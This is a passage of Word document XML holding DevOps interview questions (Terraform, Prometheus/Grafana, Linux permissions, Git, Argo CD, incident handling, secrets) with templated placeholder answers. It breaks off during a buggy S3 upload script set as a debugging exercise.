        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker/Runtime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 container communicate with the Linux kernel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. Design a multi-cloud deployment using Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Architecture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multi-cloud deployment using Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. What are the basic Terraform commands?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Fundamentals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basic Terraform commands?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. What happens if the S3 bucket storing the Terraform state is accidentally deleted?</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the S3 bucket storing the Terraform state is accidentally deleted?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. If the Terraform state becomes very large, how do you manage it?</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Terraform state becomes very large, how do you manage it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. Did you create Terraform modules from scratch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Modules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create Terraform modules from scratch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. How many Terraform services/resources have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Experience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many Terraform services/resources have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. Where do you prefer to store Terraform state?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prefer to store Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. How would you design a monitoring solution for microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Architecture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 monitoring solution for microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. What is the difference between monitoring and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Fundamentals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monitoring and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. Have you used Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Experience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Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. How do you deploy Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Deployment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Prometheus and Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. How do you expose application metrics to Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Metrics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application metrics to Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. How do you configure alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Alerting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alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. Why do we use sudo instead of logging in as the root user?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Security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sudo instead of logging in as the root user?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. Explain Linux file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Permissions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Linux file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Why should we avoid 777 permissions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Permissions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should we avoid 777 permissions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. Why do we have both /etc/passwd and /etc/shadow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Security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have both /etc/passwd and /etc/shadow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Write a shell script to find files with 777 permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Scripting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Write a shell script to find files with 777 permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. How have you used Python in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Python/DevOps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used Python in DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Write a Python script to upload a file to an S3 bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Python/Automation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Write a Python script to upload a file to an S3 bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. Name the common Git commands you use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Fundamentals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Name the common Git commands you use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. How do you clone only a single branch from a repository?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Branches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Branches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clone only a single branch from a repository?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. What is git cherry-pick?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Workflow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git cherry-pick?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. What is the difference between git clone, git fetch, and git pull?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git/Fundamentals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git clone, git fetch, and git pull?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Have you worked with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Argo CD/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Argo CD/Experience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Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. What is GitOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Argo CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Argo 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GitOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. What is your hands-on experience with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Argo CD/Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Argo CD/Experience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hands-on experience with Argo CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. How do you handle a production incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Support/Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Support/Incident Response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a production incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q64. Do you log in directly to production servers, or do you follow an incident management process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Support/Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Support/Process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log in directly to production servers, or do you follow an incident management process?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. How do you communicate during a Sev-1 incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Support/Communication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Support/Communication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communicate during a Sev-1 incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. How do you improve application security in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Application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improve application security in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. How do you manage secrets securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Secrets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secrets securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. How do you secure Docker images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Containers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Docker images?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Do you have any questions for us?</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any questions for us?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. What kind of role are you looking for?</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role are you looking for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Do you have any feedback for us?</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any feedback for us?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. Is there anything else you’d like to ask?</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there anything else you’d like to ask?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. Debug and complete the following Python script intended to upload a local file to an S3 bucket. Identify the syntax, naming, path, object-key, exception-handling, and AWS credential issues; then provide a production-safe version.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Import boto3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>From botocore.exceptions import clientError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
